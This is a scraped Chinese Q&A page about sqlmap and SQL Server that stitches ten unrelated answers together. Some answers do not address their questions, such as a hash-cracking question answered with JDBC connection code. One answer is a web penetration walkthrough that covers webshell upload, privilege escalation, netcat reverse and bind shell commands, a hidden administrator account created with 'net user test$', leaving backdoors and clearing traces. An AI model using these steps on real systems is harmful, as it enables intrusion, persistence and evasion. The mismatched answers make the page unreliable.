當前位置:首頁 » 編程語言 » sqlmapsqlserver
擴展閱讀
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

sqlmapsqlserver

發布時間: 2023-01-26 07:26:17

1. 漏洞掃描工具哪個好

您好,希望以下回答能幫助您
流光 x-scan x-way 都不錯!個人推薦用x-scan! 其實流光更好用!只不過每次用的時候要關掉殺毒軟體!
如您還有疑問可繼續追問。

2. Postgresql存儲過程轉換SQLServer的

因sql server2000中不允許調用當前時間的函數getdate(),也不允許非表變數之外的update、insert、delete操作,故這里修改為存儲過程,其中原來的return值改用輸出參數"@Result int output"來實現,具體如下:

CREATE PROCEDURE web_login(@web_username varchar(50), @web_pwd varchar(50), @web_ip varchar(50),@Result int output)
AS
BEGIN
declare
@len int, -- -2 fail -3 lockip
@u_locktime varchar(10),
@u_cleartime varchar(50),
@u_count int,
@user_id int,
@log_id int,
@cal int

set @len=0

select @u_count=config_value from as_all_config where config_item='U_AllowCount'
select @u_cleartime=config_value from as_all_config where config_item='U_LimitDay'
set @cal=@u_cleartime
select @u_locktime=config_value from as_all_config where config_item='U_Locktime'
--判斷用戶是否已經鎖定
select top 1 @len=serialno from web_user_log where login_id =@web_username and last_ip=@web_ip and last_lock_time<getdate() and last_count= @u_count
if @len>0
begin
insert into as_log(log_fromtype, log_type,log_text, log_level) values(8,4,'用戶 '+@web_username+'登錄失敗 ip鎖定',1)
set @Result=-3
RETURN
end
--判斷用戶失敗次數
select top 1 @len=last_count,@log_id=serialno from web_user_log where login_id =@web_username and last_ip=@web_ip and convert(varchar(10),last_fail_time,120)=convert(varchar(10),getdate(),120) order by last_fail_time desc
if @len>3
begin
update web_user_log set last_lock_time=getdate() where serialno=@log_id
insert into as_log(log_fromtype, log_type,log_text, log_level) values(8,4,'用戶 '+@web_username+'登錄失敗 ip鎖定',1)
set @Result=-3
RETURN
end
--正常操作
select top 1 @len=last_count, @log_id=serialno from web_user_log where login_id =@web_username and last_ip=@web_ip and convert(varchar(10),last_fail_time,120)=convert(varchar(10),getdate(),120) order by last_fail_time desc
select top 1 @user_id=serialno from web_user where login_id = @web_username and login_pwd=@web_pwd
delete from web_user_log where login_id =@web_username and last_lock_time<=convert(varchar(10),dateadd(day,-@cal,getdate()),120)
if @user_id>0
begin
insert into as_log( log_fromtype, log_type, log_text, log_level) values(8,4,'用戶 '+@web_username+'登錄成功',1)
set @Result=@user_id
RETURN
end
else if (@len is null or @len=0)
insert into web_user_log(last_count, last_ip, login_pwd, login_id) values(1,@web_ip,@web_pwd,@web_username)
else
update web_user_log set last_count=last_count+1 where serialno=@log_id

insert into as_log(log_fromtype, log_type, log_text, log_level)values(8,4,'用戶 '+@web_username+'登錄失敗',1)
set @Result=-2
RETURN
END
go

--更改當前資料庫中對象的所有者:
sp_changeobjectowner 'web_login','ema_user'
go

3. sqlmap探網頁礙事嗎

sqlmap探網頁不礙事,sqlmap只是用來檢測和利用sql注入點,對於探網頁是並不妨礙的。

sqlmap是一個自動化的SQL注入工具,其主要功能是掃描,發現並利用給定的URL的SQL注入漏洞,目前支持的資料庫是MySQL,Oracle,PostgreSQL,MicrosoftSQLServer,MicrosoftAccess,IBMDB2,SQLite,Firebird,Sybase和SAPMaxDB。

4. 把mysql語法改成sqlserver語法

這上面的SQL語句基本沒有變化,
<![CDATA[SELECT LAST_INSERT_ID() AS ID ]]>---》SELECT @@IDENTITY
insert into t_docrecord(id,filename,doctype,lastmodify) values
(?,?,?,?)-》
insert into t_docrecord(id,filename,doctype,lastmodify) values
(@id,@filename,@doctype,@lastmodify)

select * from t_docrecord where filename=#value#->select * from t_docrecord where filename=@filename
下面一樣的就不再改了,都改成@ID 開頭,到時用SQL命名參數來處理,

5. C#sqlmapper怎麼訪問sqlserver,求寫個例子和介紹

SqlMap.config文件
<database>
<provider name="sqlServer2005"/>
<dataSource name="iBatisNet" connectionString="Data Source=127.0.0.1;
Initial Catalog=sssssss;
User ID=sa;password=123"/>
</database>

<sqlMaps>

<sqlMap resource="Mappings/LocalDB/UserMapping.xml"></sqlMap>
</sqlMaps>

providers.config文件
<provider
name="sqlServer2005"
enabled="true"
.....


public class BaseDAL : IBaseDAL
{
ISqlMapper sqlMapper;

public BaseDAL()
{

sqlMapper = Mapper.Instance();
}

public BaseDAL(ISqlMapper map)
{
sqlMapper = map;
}

public int Insert<T>(string statementName, T t)
{
//ISqlMapper iSqlMapper = Mapper.Instance();
if (sqlMapper != null)
.....

別忘了新建的各種mapping的文件屬性、嵌入或者內容始終復制,更別忘啦添加引用Mybatis的dll

6. sqlmap跑的hash怎麼破解

首先得有這個 sqljdbc.jar 驅動包哦
下面是連接代碼:
package com.message.;

/**
*BaseDao
*2009
*資料庫連接包
*/
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class BaseDao{
public final static String driver = "com.microsoft.sqlserver.jdbc.SQLServerDriver"; // 資料庫驅動
public final static String url = "jdbc:sqlserver://localhost:1433;DataBaseName=messageBoard";// url
public final static String dbName = "sa"; // 資料庫用戶名
public final static String dbPass = "sa"; // 資料庫密碼

/**
* 得到資料庫連接
* @throws ClassNotFoundException
* @throws SQLException
* @return 資料庫連接
*/
public Connection getConn(){
Connection con = null ;
try {
Class.forName(driver); //注冊驅動
con = DriverManager .getConnection(url,dbName,dbPass); //獲得資料庫連接
} catch (ClassNotFoundException e) {
e.printStackTrace();
} catch (SQLException e) {
e.printStackTrace();
}
return con ; //返回連接
}

/**
* 釋放資源
* @param con 資料庫連接
* @param prs PreparedStatement對象
* @param rs 結果集
*/
public void closeAll( Connection con, PreparedStatement prs, ResultSet rs ) {
/* 如果rs不空,關閉rs */
if(rs != null){
try { rs.close();} catch (SQLException e) {e.printStackTrace();}
}
/* 如果prs不空,關閉prs */
if(prs != null){
try { prs.close();} catch (SQLException e) {e.printStackTrace();}
}
/* 如果con不空,關閉con */
if(con != null){
try { con.close();} catch (SQLException e) {e.printStackTrace();}
}
}

/**
* 執行SQL語句,可以進行增、刪、改的操作,不能執行查詢
* @param sql 預編譯的 SQL 語句
* @param param 預編譯的 SQL 語句中的『?』參數的字元串數組
* @return 影響的條數
*/
public int executeSQL(String preparedSql,Object[] param) {
Connection con = null;
PreparedStatement prs = null;
int num = 0;

/* 處理SQL,執行SQL */
try {
con = getConn(); // 得到資料庫連接
prs = con.prepareStatement(preparedSql); // 得到PreparedStatement對象
if( param != null ) {
for( int i = 0; i < param.length; i++ ) {
prs.setObject(i+1, param[i]); // 為預編譯sql設置參數
}
}
num = prs.executeUpdate(); // 執行SQL語句
} catch (SQLException e) {
e.printStackTrace(); // 處理SQLException異常
} finally {
closeAll(con,prs,null); // 釋放資源
}
return num;
}

}

7. [Microsoft][SQLServer 2000 Driver for JDBC][SQLServer]用戶 'sa' 登錄失敗。

大哥! SQL2000在1,4版本上也能用嗎?好象是1.5的才行吧

8. 漏洞掃描工具有哪些

殺毒軟體,電腦管家之類都可檢查系統漏洞和下載安裝補丁。系統自己也有自動更新設置。

9. web滲透是什麼

Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標網站的源碼等信息的情況下對其滲透,相當於代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透,以下所說的Web滲透就是黑盒滲透。

Web滲透分為以下幾個步驟,信息收集,漏洞掃描,漏洞利用,提權,內網滲透,留後門,清理痕跡。一般的滲透思路就是看是否有注入漏洞,然後注入得到後台管理員賬號密碼,登錄後台,上傳小馬,再通過小馬上傳大馬,提權,內網轉發,進行內網滲透,掃描內網c段存活主機及開放埠,看其主機有無可利用漏洞(nessus)埠(nmap)對應服務及可能存在的漏洞,對其利用(msf)拿下內網,留下後門,清理痕跡。或者看是否有上傳文件的地方,上傳一句話木馬,再用菜刀鏈接,拿到資料庫並可執行cmd命令,可繼續上大馬.........思路很多,很多時候成不成功可能就是一個思路的問題,技術可以不高,思路一定得騷。

信息收集

信息收集是整個流程的重中之重,前期信息收集的越多,Web滲透的成功率就越高。

DNS域名信息:通過url獲取其真實ip,子域名(Layer子域名爆破機),旁站(K8旁站,御劍1.5),c段,網站負責人及其信息(whois查詢)

整站信息:伺服器操作系統、伺服器類型及版本(Apache/Nginx/Tomcat/IIS)、資料庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型;

網站常見搭配為:

ASP和ASPX:ACCESS、SQLServer

PHP:MySQL、PostgreSQL

JSP:Oracle、MySQL

敏感目錄信息(御劍,dirbust)

開放埠信息(nmp)

漏洞掃描

利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描,看其是否有可利用漏洞。

常見漏洞:

SQL注入

XSS跨站腳本

CSRF跨站請求偽造

XXE(XML外部實體注入)漏洞

SSRF(服務端請求偽造)漏洞

文件包含漏洞

文件上傳漏洞

文件解析漏洞

遠程代碼執行漏洞

CORS跨域資源共享漏洞

越權訪問漏洞

目錄遍歷漏洞和任意文件讀取/下載漏洞

漏洞利用

用工具也好什麼也好對相應漏洞進行利用

如:

Sql注入(sqlmap)

XSS(BEEF)

後台密碼爆破(burp)

埠爆破(hydra)

提權

獲得shell之後我們許可權可能很低,因此要對自己提權,可以根據伺服器版本對應的exp進行提權,對於Windows系統也可看其補丁對應漏洞的exp進行提權

內網滲透

首先進行埠轉發可用nc

nc使用方法:

反向連接

在公網主機上進行監聽:

nc-lvp 4444

在內網主機上執行:

nc-e cmd.exe 公網主機ip4444

成功之後即可得到一個內網主機shell

正向連接

遠程主機上執行:

nc-l -p 4444 -t -e cmd.exe

本地主機上執行:

nc-vv 遠程主機ip4444

成功後,本地主機即可遠程主機的一個shell

然後就是對內網進行滲透了,可以用主機漏洞掃描工具(nessus,x-scan等)進行掃描看是否有可用漏洞,可用msf進行利用,或者用nmap掃描存活主機及開放埠,可用hydra進行埠爆破或者用msf對埠對應漏洞得到shell拿下內網留後門

留後門

對於網站上傳一句話木馬,留下後門

對於windows用戶可用hideadmin創建一個超級隱藏賬戶

手工:

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

這樣的話在cmd命令中看不到,但在控制面板可以看到,還需要改注冊表才能實現控製版面也看不到,太過麻煩,不多贅述,所以還是用工具省心省力。

10. 如何使用sqlmap掃描sql注入漏洞

先准備好MS SQLServer和MySQL的jdbc驅動。 在Oracle SQLDeveloper引入驅動: 工具--首選項--資料庫--第三方jdbc驅動程序 最後在新建鏈接時,就可以看到sqlserver和mysql的標簽了。